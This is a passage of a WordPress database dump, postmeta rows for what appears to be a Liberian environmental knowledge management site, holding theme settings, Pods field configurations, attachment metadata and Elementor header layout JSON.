;}i:3;a:1:{s:2:\"id\";i:3063;}i:4;a:1:{s:2:\"id\";i:2804;}i:5;a:1:{s:2:\"id\";i:3746;}}}s:32:\"c25bc195e0e14f2d43d89aafd17aa763\";a:2:{s:7:\"expires\";i:1628975847;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3038;}i:1;a:1:{s:2:\"id\";i:2813;}i:2;a:1:{s:2:\"id\";i:3063;}}}s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628976268;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3764;}i:1;a:1:{s:2:\"id\";i:3038;}i:2;a:1:{s:2:\"id\";i:2813;}}}}'),(25390,3781,'_edit_lock','1626816524:42'),(25391,3781,'_last_editor_used_jetpack','block-editor'),(25392,3782,'_wp_attached_file','2021/07/kehkeh.png'),(25393,3782,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:18:\"2021/07/kehkeh.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"kehkeh-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"kehkeh-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"kehkeh-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25396,3781,'_thumbnail_id','3782'),(25397,3781,'_edit_last','42'),(25398,3781,'ocean_gallery_link_images','off'),(25399,3781,'ocean_sidebar','0'),(25400,3781,'ocean_second_sidebar','0'),(25401,3781,'ocean_disable_margins','enable'),(25402,3781,'ocean_display_top_bar','default'),(25403,3781,'ocean_display_header','default'),(25404,3781,'ocean_center_header_left_menu','0'),(25405,3781,'ocean_custom_header_template','0'),(25406,3781,'ocean_header_custom_menu','0'),(25407,3781,'ocean_menu_typo_font_family','0'),(25408,3781,'ocean_disable_title','default'),(25409,3781,'ocean_disable_heading','default'),(25410,3781,'ocean_disable_breadcrumbs','default'),(25411,3781,'ocean_display_footer_widgets','default'),(25412,3781,'ocean_display_footer_bottom','default'),(25413,3781,'ocean_custom_footer_template','0'),(25414,3781,'ocean_link_format_target','self'),(25415,3781,'ocean_quote_format_link','post'),(25416,3781,'osh_disable_topbar_sticky','default'),(25417,3781,'osh_disable_header_sticky','default'),(25418,3781,'osh_sticky_header_style','default'),(25419,3787,'_last_editor_used_jetpack','classic-editor'),(25420,3787,'_edit_lock','1629362535:42'),(25421,3787,'_edit_last','42'),(25422,3788,'_last_editor_used_jetpack','classic-editor'),(25423,3788,'_edit_lock','1629362481:42'),(25424,3788,'_edit_last','42'),(25425,3789,'_last_editor_used_jetpack','classic-editor'),(25426,3789,'_edit_lock','1629713705:42'),(25427,3789,'_edit_last','42'),(25428,3790,'_last_editor_used_jetpack','classic-editor'),(25429,3790,'_edit_lock','1629714014:42'),(25430,3790,'_edit_last','42'),(25431,3791,'_last_editor_used_jetpack','classic-editor'),(25432,3791,'_edit_lock','1629714348:42'),(25433,3791,'_edit_last','42'),(25434,3789,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628081756;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3788;}i:1;a:1:{s:2:\"id\";i:3175;}i:2;a:1:{s:2:\"id\";i:3180;}}}}'),(25435,3790,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628725741;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3791;}i:1;a:1:{s:2:\"id\";i:3181;}i:2;a:1:{s:2:\"id\";i:3053;}}}}'),(25436,3787,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628254426;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3707;}i:1;a:1:{s:2:\"id\";i:3704;}i:2;a:1:{s:2:\"id\";i:3178;}}}}'),(25437,3791,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628254314;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3790;}i:1;a:1:{s:2:\"id\";i:3053;}i:2;a:1:{s:2:\"id\";i:3705;}}}}'),(25438,3788,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628254247;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3704;}i:1;a:1:{s:2:\"id\";i:3175;}i:2;a:1:{s:2:\"id\";i:3789;}}}}'),(25439,68,'_last_editor_used_jetpack','block-editor'),(25440,335,'_last_editor_used_jetpack','block-editor'),(25441,3102,'_last_editor_used_jetpack','classic-editor'),(25442,714,'supports_jetpack_publicize','0'),(25443,714,'supports_jetpack_markdown','0'),(25444,714,'pfat_filter_archive_custom','the_content'),(25445,3795,'type','file'),(25446,3795,'pick_object','custom-simple'),(25447,3795,'required','0'),(25448,3795,'text_allow_shortcode','0'),(25449,3795,'text_allow_html','0'),(25450,3795,'text_allowed_html_tags','strong em a ul ol li b i'),(25451,3795,'text_max_length','255'),(25452,3795,'website_format','normal'),(25453,3795,'website_allow_port','0'),(25454,3795,'website_clickable','0'),(25455,3795,'website_new_window','0'),(25456,3795,'website_max_length','255'),(25457,3795,'website_html5','0'),(25458,3795,'phone_format','999-999-9999 x999'),(25459,3795,'phone_enable_phone_extension','1'),(25460,3795,'phone_max_length','25'),(25461,3795,'phone_html5','0'),(25462,3795,'email_max_length','255'),(25463,3795,'email_html5','0'),(25464,3795,'password_max_length','255'),(25465,3795,'paragraph_allow_html','1'),(25466,3795,'paragraph_oembed','0'),(25467,3795,'paragraph_wptexturize','1'),(25468,3795,'paragraph_convert_chars','1'),(25469,3795,'paragraph_wpautop','1'),(25470,3795,'paragraph_allow_shortcode','0'),(25471,3795,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(25472,3795,'paragraph_max_length','0'),(25473,3795,'wysiwyg_editor','tinymce'),(25474,3795,'wysiwyg_media_buttons','1'),(25475,3795,'wysiwyg_oembed','0'),(25476,3795,'wysiwyg_wptexturize','1'),(25477,3795,'wysiwyg_convert_chars','1'),(25478,3795,'wysiwyg_wpautop','1'),(25479,3795,'wysiwyg_allow_shortcode','0'),(25480,3795,'code_allow_shortcode','0'),(25481,3795,'code_max_length','0'),(25482,3795,'datetime_type','format'),(25483,3795,'datetime_format','mdy'),(25484,3795,'datetime_time_type','12'),(25485,3795,'datetime_time_format','h_mma'),(25486,3795,'datetime_time_format_24','hh_mm'),(25487,3795,'datetime_allow_empty','1'),(25488,3795,'datetime_html5','0'),(25489,3795,'date_type','format'),(25490,3795,'date_format','mdy'),(25491,3795,'date_allow_empty','1'),(25492,3795,'date_html5','0'),(25493,3795,'time_type','12'),(25494,3795,'time_format','h_mma'),(25495,3795,'time_format_24','hh_mm'),(25496,3795,'time_allow_empty','1'),(25497,3795,'time_html5','0'),(25498,3795,'number_format_type','number'),(25499,3795,'number_format','i18n'),(25500,3795,'number_decimals','0'),(25501,3795,'number_format_soft','0'),(25502,3795,'number_step','1'),(25503,3795,'number_min','0'),(25504,3795,'number_max','100'),(25505,3795,'number_max_length','12'),(25506,3795,'currency_format_type','number'),(25507,3795,'currency_format_sign','usd'),(25508,3795,'currency_format_placement','before'),(25509,3795,'currency_format','i18n'),(25510,3795,'currency_decimals','2'),(25511,3795,'currency_decimal_handling','none'),(25512,3795,'currency_step','1'),(25513,3795,'currency_min','0'),(25514,3795,'currency_max','1000'),(25515,3795,'currency_max_length','12'),(25516,3795,'file_format_type','single'),(25517,3795,'file_uploader','attachment'),(25518,3795,'file_attachment_tab','upload'),(25519,3795,'file_upload_dir','wp'),(25520,3795,'file_edit_title','1'),(25521,3795,'file_show_edit_link','0'),(25522,3795,'file_linked','0'),(25523,3795,'file_limit','0'),(25524,3795,'file_restrict_filesize','10MB'),(25525,3795,'file_type','images'),(25526,3795,'file_field_template','rows'),(25527,3795,'file_add_button','Add File'),(25528,3795,'file_modal_title','Attach a file'),(25529,3795,'file_modal_add_button','Add File'),(25530,3795,'file_wp_gallery_output','0'),(25531,3795,'file_wp_gallery_link','post'),(25532,3795,'file_wp_gallery_columns','1'),(25533,3795,'file_wp_gallery_random_sort','0'),(25534,3795,'file_wp_gallery_size','thumbnail'),(25535,3795,'oembed_width','0'),(25536,3795,'oembed_height','0'),(25537,3795,'oembed_show_preview','0'),(25538,3795,'oembed_restrict_providers','0'),(25539,3795,'oembed_enabled_providers_amazoncn','0'),(25540,3795,'oembed_enabled_providers_amazoncouk','0'),(25541,3795,'oembed_enabled_providers_amazoncom','0'),(25542,3795,'oembed_enabled_providers_amazoncomau','0'),(25543,3795,'oembed_enabled_providers_amazonin','0'),(25544,3795,'oembed_enabled_providers_animotocom','0'),(25545,3795,'oembed_enabled_providers_cloudupcom','0'),(25546,3795,'oembed_enabled_providers_crowdsignalcom','0'),(25547,3795,'oembed_enabled_providers_dailymotioncom','0'),(25548,3795,'oembed_enabled_providers_facebookcom','0'),(25549,3795,'oembed_enabled_providers_flickrcom','0'),(25550,3795,'oembed_enabled_providers_gfycatcom','0'),(25551,3795,'oembed_enabled_providers_icloudcom','0'),(25552,3795,'oembed_enabled_providers_imgurcom','0'),(25553,3795,'oembed_enabled_providers_issuucom','0'),(25554,3795,'oembed_enabled_providers_kickstartercom','0'),(25555,3795,'oembed_enabled_providers_loomcom','0'),(25556,3795,'oembed_enabled_providers_mesh','0'),(25557,3795,'oembed_enabled_providers_meetupcom','0'),(25558,3795,'oembed_enabled_providers_mixcloudcom','0'),(25559,3795,'oembed_enabled_providers_odeslico','0'),(25560,3795,'oembed_enabled_providers_redditcom','0'),(25561,3795,'oembed_enabled_providers_reverbnationcom','0'),(25562,3795,'oembed_enabled_providers_screencastcom','0'),(25563,3795,'oembed_enabled_providers_scribdcom','0'),(25564,3795,'oembed_enabled_providers_sketchfabcom','0'),(25565,3795,'oembed_enabled_providers_slidesharenet','0'),(25566,3795,'oembed_enabled_providers_smugmugcom','0'),(25567,3795,'oembed_enabled_providers_someecardscom','0'),(25568,3795,'oembed_enabled_providers_soundcloudcom','0'),(25569,3795,'oembed_enabled_providers_speakerdeckcom','0'),(25570,3795,'oembed_enabled_providers_spotifycom','0'),(25571,3795,'oembed_enabled_providers_tedcom','0'),(25572,3795,'oembed_enabled_providers_tiktokcom','0'),(25573,3795,'oembed_enabled_providers_tumblrcom','0'),(25574,3795,'oembed_enabled_providers_twittercom','0'),(25575,3795,'oembed_enabled_providers_vimeocom','0'),(25576,3795,'oembed_enabled_providers_wistiacom','0'),(25577,3795,'oembed_enabled_providers_wordpresscom','0'),(25578,3795,'oembed_enabled_providers_wordpresstv','0'),(25579,3795,'oembed_enabled_providers_youtubecom','0'),(25580,3795,'pick_format_type','single'),(25581,3795,'pick_format_single','dropdown'),(25582,3795,'pick_format_multi','checkbox'),(25583,3795,'pick_display_format_multi','default'),(25584,3795,'pick_display_format_separator',', '),(25585,3795,'pick_allow_add_new','1'),(25586,3795,'pick_taggable','0'),(25587,3795,'pick_show_icon','1'),(25588,3795,'pick_show_edit_link','1'),(25589,3795,'pick_show_view_link','1'),(25590,3795,'pick_limit','0'),(25591,3795,'pick_user_role','a:0:{}'),(25592,3795,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(25593,3795,'boolean_format_type','checkbox'),(25594,3795,'boolean_yes_label','Yes'),(25595,3795,'boolean_no_label','No'),(25596,3795,'admin_only','0'),(25597,3795,'restrict_role','0'),(25598,3795,'restrict_capability','0'),(25599,3795,'hidden','0'),(25600,3795,'read_only','0'),(25601,3795,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(25602,3795,'rest_read','0'),(25603,3795,'rest_write','0'),(25604,3795,'rest_pick_response','array'),(25605,3795,'rest_pick_depth','1'),(25606,3796,'type','website'),(25607,3796,'required','0'),(25608,3796,'text_allow_shortcode','0'),(25609,3796,'text_allow_html','0'),(25610,3796,'text_allowed_html_tags','strong em a ul ol li b i'),(25611,3796,'text_max_length','255'),(25612,3796,'website_format','normal'),(25613,3796,'website_allow_port','0'),(25614,3796,'website_clickable','0'),(25615,3796,'website_new_window','0'),(25616,3796,'website_max_length','255'),(25617,3796,'website_html5','0'),(25618,3796,'phone_format','999-999-9999 x999'),(25619,3796,'phone_enable_phone_extension','1'),(25620,3796,'phone_max_length','25'),(25621,3796,'phone_html5','0'),(25622,3796,'email_max_length','255'),(25623,3796,'email_html5','0'),(25624,3796,'password_max_length','255'),(25625,3796,'paragraph_allow_html','1'),(25626,3796,'paragraph_oembed','0'),(25627,3796,'paragraph_wptexturize','1'),(25628,3796,'paragraph_convert_chars','1'),(25629,3796,'paragraph_wpautop','1'),(25630,3796,'paragraph_allow_shortcode','0'),(25631,3796,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(25632,3796,'paragraph_max_length','0'),(25633,3796,'wysiwyg_editor','tinymce'),(25634,3796,'wysiwyg_media_buttons','1'),(25635,3796,'wysiwyg_oembed','0'),(25636,3796,'wysiwyg_wptexturize','1'),(25637,3796,'wysiwyg_convert_chars','1'),(25638,3796,'wysiwyg_wpautop','1'),(25639,3796,'wysiwyg_allow_shortcode','0'),(25640,3796,'code_allow_shortcode','0'),(25641,3796,'code_max_length','0'),(25642,3796,'datetime_type','format'),(25643,3796,'datetime_format','mdy'),(25644,3796,'datetime_time_type','12'),(25645,3796,'datetime_time_format','h_mma'),(25646,3796,'datetime_time_format_24','hh_mm'),(25647,3796,'datetime_allow_empty','1'),(25648,3796,'datetime_html5','0'),(25649,3796,'date_type','format'),(25650,3796,'date_format','mdy'),(25651,3796,'date_allow_empty','1'),(25652,3796,'date_html5','0'),(25653,3796,'time_type','12'),(25654,3796,'time_format','h_mma'),(25655,3796,'time_format_24','hh_mm'),(25656,3796,'time_allow_empty','1'),(25657,3796,'time_html5','0'),(25658,3796,'number_format_type','number'),(25659,3796,'number_format','i18n'),(25660,3796,'number_decimals','0'),(25661,3796,'number_format_soft','0'),(25662,3796,'number_step','1'),(25663,3796,'number_min','0'),(25664,3796,'number_max','100'),(25665,3796,'number_max_length','12'),(25666,3796,'currency_format_type','number'),(25667,3796,'currency_format_sign','usd'),(25668,3796,'currency_format_placement','before'),(25669,3796,'currency_format','i18n'),(25670,3796,'currency_decimals','2'),(25671,3796,'currency_decimal_handling','none'),(25672,3796,'currency_step','1'),(25673,3796,'currency_min','0'),(25674,3796,'currency_max','1000'),(25675,3796,'currency_max_length','12'),(25676,3796,'file_format_type','single'),(25677,3796,'file_uploader','attachment'),(25678,3796,'file_attachment_tab','upload'),(25679,3796,'file_upload_dir','wp'),(25680,3796,'file_edit_title','1'),(25681,3796,'file_show_edit_link','0'),(25682,3796,'file_linked','0'),(25683,3796,'file_limit','0'),(25684,3796,'file_restrict_filesize','10MB'),(25685,3796,'file_type','images'),(25686,3796,'file_field_template','rows'),(25687,3796,'file_add_button','Add File'),(25688,3796,'file_modal_title','Attach a file'),(25689,3796,'file_modal_add_button','Add File'),(25690,3796,'file_wp_gallery_output','0'),(25691,3796,'file_wp_gallery_link','post'),(25692,3796,'file_wp_gallery_columns','1'),(25693,3796,'file_wp_gallery_random_sort','0'),(25694,3796,'file_wp_gallery_size','thumbnail'),(25695,3796,'oembed_width','0'),(25696,3796,'oembed_height','0'),(25697,3796,'oembed_show_preview','0'),(25698,3796,'oembed_restrict_providers','0'),(25699,3796,'oembed_enabled_providers_amazoncn','0'),(25700,3796,'oembed_enabled_providers_amazoncouk','0'),(25701,3796,'oembed_enabled_providers_amazoncom','0'),(25702,3796,'oembed_enabled_providers_amazoncomau','0'),(25703,3796,'oembed_enabled_providers_amazonin','0'),(25704,3796,'oembed_enabled_providers_animotocom','0'),(25705,3796,'oembed_enabled_providers_cloudupcom','0'),(25706,3796,'oembed_enabled_providers_crowdsignalcom','0'),(25707,3796,'oembed_enabled_providers_dailymotioncom','0'),(25708,3796,'oembed_enabled_providers_facebookcom','0'),(25709,3796,'oembed_enabled_providers_flickrcom','0'),(25710,3796,'oembed_enabled_providers_gfycatcom','0'),(25711,3796,'oembed_enabled_providers_icloudcom','0'),(25712,3796,'oembed_enabled_providers_imgurcom','0'),(25713,3796,'oembed_enabled_providers_issuucom','0'),(25714,3796,'oembed_enabled_providers_kickstartercom','0'),(25715,3796,'oembed_enabled_providers_loomcom','0'),(25716,3796,'oembed_enabled_providers_mesh','0'),(25717,3796,'oembed_enabled_providers_meetupcom','0'),(25718,3796,'oembed_enabled_providers_mixcloudcom','0'),(25719,3796,'oembed_enabled_providers_odeslico','0'),(25720,3796,'oembed_enabled_providers_redditcom','0'),(25721,3796,'oembed_enabled_providers_reverbnationcom','0'),(25722,3796,'oembed_enabled_providers_screencastcom','0'),(25723,3796,'oembed_enabled_providers_scribdcom','0'),(25724,3796,'oembed_enabled_providers_sketchfabcom','0'),(25725,3796,'oembed_enabled_providers_slidesharenet','0'),(25726,3796,'oembed_enabled_providers_smugmugcom','0'),(25727,3796,'oembed_enabled_providers_someecardscom','0'),(25728,3796,'oembed_enabled_providers_soundcloudcom','0'),(25729,3796,'oembed_enabled_providers_speakerdeckcom','0'),(25730,3796,'oembed_enabled_providers_spotifycom','0'),(25731,3796,'oembed_enabled_providers_tedcom','0'),(25732,3796,'oembed_enabled_providers_tiktokcom','0'),(25733,3796,'oembed_enabled_providers_tumblrcom','0'),(25734,3796,'oembed_enabled_providers_twittercom','0'),(25735,3796,'oembed_enabled_providers_vimeocom','0'),(25736,3796,'oembed_enabled_providers_wistiacom','0'),(25737,3796,'oembed_enabled_providers_wordpresscom','0'),(25738,3796,'oembed_enabled_providers_wordpresstv','0'),(25739,3796,'oembed_enabled_providers_youtubecom','0'),(25740,3796,'pick_format_type','single'),(25741,3796,'pick_format_single','dropdown'),(25742,3796,'pick_format_multi','checkbox'),(25743,3796,'pick_display_format_multi','default'),(25744,3796,'pick_display_format_separator',', '),(25745,3796,'pick_allow_add_new','1'),(25746,3796,'pick_taggable','0'),(25747,3796,'pick_show_icon','1'),(25748,3796,'pick_show_edit_link','1'),(25749,3796,'pick_show_view_link','1'),(25750,3796,'pick_limit','0'),(25751,3796,'pick_user_role','a:0:{}'),(25752,3796,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(25753,3796,'boolean_format_type','checkbox'),(25754,3796,'boolean_yes_label','Yes'),(25755,3796,'boolean_no_label','No'),(25756,3796,'admin_only','0'),(25757,3796,'restrict_role','0'),(25758,3796,'restrict_capability','0'),(25759,3796,'hidden','0'),(25760,3796,'read_only','0'),(25761,3796,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(25762,3796,'rest_read','0'),(25763,3796,'rest_write','0'),(25764,3796,'rest_pick_response','array'),(25765,3796,'rest_pick_depth','1'),(25772,30,'_last_editor_used_jetpack','classic-editor'),(25774,3800,'_elementor_edit_mode','builder'),(25775,3800,'_elementor_template_type','header'),(25776,3800,'_elementor_version','3.4.3'),(25777,3800,'_elementor_pro_version','3.3.6'),(25778,3800,'_edit_lock','1632119481:43'),(25783,3803,'_elementor_edit_mode','builder'),(25784,3803,'_elementor_template_type','header'),(25785,3803,'_elementor_version','3.3.1'),(25786,3803,'_elementor_pro_version','3.3.6'),(25787,3800,'_wp_page_template','default'),(25788,3800,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}],\"z_index\":10},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.077999999999999403144101961515843868255615234375},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":56.8509999999999990905052982270717620849609375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":20.995999999999998664179656771011650562286376953125,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f28ff03\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":9.047000000000000596855898038484156131744384765625},\"elements\":[{\"id\":\"aed2366\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":86.921999999999997044142219237983226776123046875},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"f95713d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":13.0210000000000007958078640513122081756591796875,\"content_position\":\"center\",\"text_align\":\"center\"},\"elements\":[{\"id\":\"3c1f6ee\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[gtranslate]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(25789,3804,'_elementor_edit_mode','builder'),(25790,3804,'_elementor_template_type','header'),(25791,3804,'_elementor_version','3.3.1'),(25792,3804,'_elementor_pro_version','3.3.6'),(25793,3804,'_wp_page_template','default'),(25794,3804,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"bottom\",\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}]},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":16.006},\"elements\":[],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":61.748},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.912,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}]},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle 